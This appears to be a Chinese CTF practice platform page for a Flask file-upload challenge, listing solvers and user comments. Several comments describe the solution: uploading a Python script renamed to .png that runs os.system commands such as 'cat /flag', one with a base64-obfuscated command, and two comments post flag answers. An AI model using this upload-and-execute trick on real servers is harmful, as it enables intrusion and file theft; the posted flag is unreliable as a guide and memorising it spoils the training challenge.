Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Lazzaro
一血奖励:
3金币
解 决:
12794
提 示:
描 述:
Flask_FileUpload
评分(20)
解题动态
Tyro、 攻破了该题 6小时前
Sylvia 攻破了该题 12小时前
moonSTRUCK 攻破了该题 1天前
69岁带病伏击 攻破了该题 2天前
CN19169645762 攻破了该题 3天前
王永诺诺 攻破了该题 3天前
mobao 攻破了该题 4天前
e1evenll 攻破了该题 4天前
ctf-newhand 攻破了该题 4天前
啦啦 攻破了该题 4天前
静水流云 攻破了该题 4天前
HuangYanQwQ 攻破了该题 5天前
海洋馆 攻破了该题 5天前
莫莫123 攻破了该题 5天前
hell0-hnc 攻破了该题 5天前
Jaker 攻破了该题 5天前
两只小金鱼 攻破了该题 5天前
xiyun 攻破了该题 5天前
晴空万里 攻破了该题 5天前
评论
bugkuaccount3214 23天前
举报
虽然不属于难题,但是原理内容还是不少的
cisp7 2月前
举报
flag{}{}b68
merrymu 1年前
举报
Python的os库是标准库中用于操作系统交互的核心模块,提供文件/目录操作、路径处理、进程管理等功能,实现跨平台系统调用。其全称是Operating System,通过封装底层接口简化与文件系统、环境变量等交互的复杂性。F12查看源码
ding0520 1年前
举报
检查原代码,发现上传文件限制条件是png格式,且用python代码。可以用os库破解系统里面的文件。 新建txt文件,第一行写import os ,第二行写os.system('cat /flag') ,另存为png格式文件,提交上传后,F12查看原代码,就有flag了
zhuizhui 1年前
举报
import os import base64 cmd = base64.b64decode("Y2F0IC9mbGFn").decode() # "cat /flag" os.system(cmd)
breeding 1年前
举报
不是很难,但比起题目我更想知道什么情况下才会用python去执行上传的文件?
HK1ng 1年前
举报
随便传一个jpg试一试,查看源码 发现提示会通过python执行,然后返回给我们,写个python脚本,看一下返回值,import os os.system('ls /') 然后看到根目录下有flag。cat读flag即可。
chaojiikun 1年前
举报
os.system()执行命令
tkStar 1年前
举报
先看源码,只检查了后缀是png,上传包含系统命令的python文件,后缀改成png就行
2808476708 1年前
举报
flag{abe11096bb1215a2a5f8696f4ab98f1f}